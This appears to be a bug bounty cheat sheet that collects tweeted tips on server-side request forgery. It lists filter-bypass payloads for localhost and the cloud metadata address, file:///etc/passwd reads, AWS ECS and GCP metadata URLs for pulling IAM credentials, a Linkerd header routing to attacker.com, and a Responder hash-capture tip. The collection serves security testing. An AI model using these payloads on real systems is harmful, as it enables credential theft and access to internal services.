# Server Side Request Forgery (SSRF)

* [#BugBounty Tip: When you find an SSRF vulnerability, run Responder on your server and make the vulnerable system connect back to you. Sometimes you can get NetNTLM hashes and either crack them or escalate it to an SMB Relay attack. #bugbountytip](https://twitter.com/0xfousekis/status/1075806883041173504)
* [Use URLs with embedded credentials (e.g. http://user:pass@target.com) to login on internal http services when exploiting SSRF vulnerability.](https://twitter.com/binb4sh/status/1114883676976963585)
* [#bugbountytip Found Linkerd service (look for headers such as “Via: linkerd” or “l5d-\*”)? Try SSRF by overriding dtab via request header, e.g. “l5d-dtab: /svc/\* => /$/inet/attacker.com/80” to reach your server or “l5d-dtab: /svc/\* => /$/inet/169.254.169.254/80” for AWS metadata.](https://twitter.com/nirvana_msu/status/1084144955034165248)
* [In case you wanted to test an SSRF but don't own a vps and burp collaborator is blocked you can use this https://canarytokens.org/generate ](https://twitter.com/plenumlab/status/1088583185280221187)
* [#Bugbountytip Got a SSRF? no metadata endpoints to hit? Try https://kubernetes.default.svc/metrics if you get a load crap come back jackpot you've hit the kubernetes API and this should indicate it's shit the bed time for any security team. (url can change)](https://twitter.com/Random_Robbie/status/1072242182306832384)
* [When you have a SSRF vulnerability on a Google Cloud server, the fastest way to grab all internal metadata is this "All in one" payload : hxxp://metadata.google.internal/computeMetadata/v1beta1/?recursive=true #BugBountyTip](https://twitter.com/adrien_jeanneau/status/1062460475387076608)
* [Just had a weird SSRF 'bypass' which would only pull data from their domain so anything you queried would be hxxps://www.theirdomain.com/reflectedhere/. Weirdly using /%2F//mysite.com/ caused it to hit external sites. Why? I have no idea. #bugbountytip](https://twitter.com/zseano/status/1075771910594547713)
* [When dealing with SVG XLINK SSRF, in order to fingerprint the versions of libraries on vulnerable server, Generate the wordlist locally and fuzz it. find /usr -type f -name "\*.png" >> all\_usr\_png.txt  #bugbountytip](https://twitter.com/Random_Robbie/status/1072242182306832384)
* [#bugbountytip Use URLs with embedded credentials (e.g. http://user:pass@target.com) to login on internal http services when exploiting SSRF vulnerability.](https://twitter.com/binb4sh/status/1114883676976963585)
* [Did you find the #SSRF, but http://169.254.169.254/ is blacklisted? #protip try http://0xA9FEA9FE/, http://0251.0376.0251.0376/ or get more examples from @agarri\_fr talk](https://twitter.com/Rzepsky/status/1108447769524617217)
* [#BugBounty #bugbounties #bugbountytip #infosec Bypass #SSRF filters by using http://127.1 instead of http://127.0.0.1 It resolves to the same but confuses filters blocking localhost/127.0.0.1 specifically!](https://twitter.com/LooseSecurity/status/1119026057586380800)
* [#SSRF #ProTip Sometimes, the server appends something (path, parameters, ...) to an URL your control. Simply add "#" to your URL, that may work!](https://twitter.com/Agarri_FR/status/1118509415286693889)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-LfzBtf6ZdaZkWYHjaqa%2F-LfzBugVPYv4dY030ye-%2Fimage.png?alt=media\&token=fc81a0d1-8d56-4040-a164-4cc59adf9e14)

* [Found a JIRA SSRF and want to make it more impactful? Look for what's running on port 7990, you might end up in a BitBucket server running internally with public repo access. If yes, source code is just a few hacks away.](https://twitter.com/Sahad_nk/status/1179836926573998081)
* [If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(http://google.com ) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips](https://twitter.com/defparam/status/1180094898365767680?ref_src=twsrc%5Etfw%7Ctwcamp%5Eembeddedtimeline%7Ctwterm%5Ecollection%3A1183061305483239424%7Ctwcon%5Etimelinechrome\&ref_url=https%3A%2F%2Ftwitter.com%2Fpentesterland%2Ftimelines%2F1183061305483239424)
* [169.254.169.254 <img src="https://abs.twimg.com/emoji/v2/72x72/274c.png" alt="❌" data-size="line"> http://169.254.169.254.xip.io  <img src="https://abs.twimg.com/emoji/v2/72x72/2705.png" alt="✅" data-size="line"> credit to @xenonxesece tweet. #**SSRF** #**bugbountytips** #**Bugcrowd** #**bugbounty**](https://twitter.com/Hxzeroone/status/1161543248839622656)
* [SSRF are file:///etc/passwd : Not authorized file://\\/\\/etc/passwd : Work](https://twitter.com/adrien_jeanneau/status/1030934842651942912)
* [One ssrf/lfi I come across is using UNC file paths. If you’re testing a windows host and the application is loading file.txt you can replace that with \\\http://dns.you.com\a and look for a dns hit and then try Responder if there’s egress or \\\you.com@80\\](https://twitter.com/seanmeals/status/1215698123131117577)
* [When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty](https://twitter.com/thedawgyg/status/1224450254205927432)
* [When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty](https://twitter.com/thedawgyg/status/1224547692967342080)
* [Got RCE or SSRF inside an AWS Lambda function? Request "localhost:9001/2018-06-01/runtime/invocation/next" for the function's event data. Check the HTTP headers returned too!@RhinoSecurity](https://twitter.com/SpenGietz/status/1161317376060563456)
* file:///etc/passwd : Not authorized\
  file://\\/\\/etc/passwd : Work [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hash)
* [If you have an SSRF with file system access on an ECS instance then try extracting /proc/self/environ to get UUID and then try hitting ECS metadata curl http://169.254.170.2/v2/credentials/](https://twitter.com/akhilreni_hs/status/1179833758041526272)

  [This way you'll extract IAM keys of the attached role](https://twitter.com/akhilreni_hs/status/1179833758041526272)
* [SSRF at an endpoint looking for a valid YouTube url. http://127.0.0.1:80 doesn’t work but http://127.0.0.1:80?http://youtu.be/dQw4w9WgXcQ works](https://twitter.com/rohk_infosec/status/1096258685511229440)&#x20;
* [SSRF AWS Bypasses to access metadata endpoint. Converted Decimal IP: http://2852039166/latest/meta-data/ IPV6 Compressed: http://\[::ffff:a9fe:a9fe\]/latest/meta-data/ IPV6 Expanded: http://\[0:0:0:0:0:ffff:a9fe:a9fe\]/latest/meta-data/ #bugbounty #bugbountytips #bugbountytip](https://twitter.com/Random_Robbie/status/1268186743657947137)
* [SSRF Bypass list for localhost (127.0.0.1):](https://twitter.com/LooseSecurity/status/1331270289733324805)

```
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

Also using a redirect to localhost will often work.
```

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MOdg3eWoXLapzdTrKBQ%2F-MOdnxtkwYbjDifEUoig%2Fimage.png?alt=media\&token=5dcddc41-0fee-46ce-9534-7f636e29efcd)

* [SSRF payloads http://\[::\]:80/ http://\[::\]:25/ SMTP http://\[::\]:22/ SSH http://\[::\]:3128/ http://0000::1:80/ http://0000::1:25/ SMTP http://0000::1:22/ SSH http://0000::1:3128/ http://0177.0.0.1/ http://2130706433/ = http://127.0.0.1 http://3232235521/ http://192.168.0.1](https://twitter.com/ADITYASHENDE17/status/1276719828917555202?s=20)
* [A small Burpsuite trick which helped me to find Blind SSRF -](https://twitter.com/AmitMDubey/status/1281920617931923458?s=20)

  [Step 1: Use Intruder to Bruteforce Headers Step 2: Add Burp collaborator URL as value. Step 3: Add prefix numerical payload (Pitchfork) Step 4: Use Tarborator Extension to monitor hits](https://twitter.com/AmitMDubey/status/1281920617931923458?s=20)
* [When you find a public form (contact form,etc.) try these payloads (blind ssrf), if you receive a request on your server, try SSTI... #bugbountytips #bugbounty #bugbou](https://twitter.com/m4ll0k/status/1288456254902411265?s=20)[ntytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MT9tLzw5E9hkJ1TOc1I%2F-MT9tkYnmfNQzWHAwkai%2Fimage.png?alt=media\&token=d07291e3-75ba-4fbd-9e63-73b93f363b24)

![https://twitter.com/SMHTahsin33/status/1293601681834307584?s=20](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MTAEQ3wRjUmCfcVCv3d%2F-MTAErI78RbCVBhg8jGj%2Fimage.png?alt=media\&token=f90e59f3-c38b-48ea-b8b3-e7f1484bff66)

![https://twitter.com/z0idsec/status/1301145611303940096?s=20](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MTJjZxRVyguzVI5oD8o%2F-MTJjozEXTYs66A6EwDE%2Fimage.png?alt=media\&token=62e0b1fd-3a71-47c5-851d-db679492a016)

* add this one to your wordlist : /\_includes/framer.php juicy blind ssrf via \`base\` param [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)
* [If you have a blind SSRF that can only read images (but for some reason can't read ICO files), try and find Confluence running on the internal network and request /images/icons/linkext7.gif to prove that you can access internal resources](https://twitter.com/infosec_au/status/1404302038964457472?s=20)
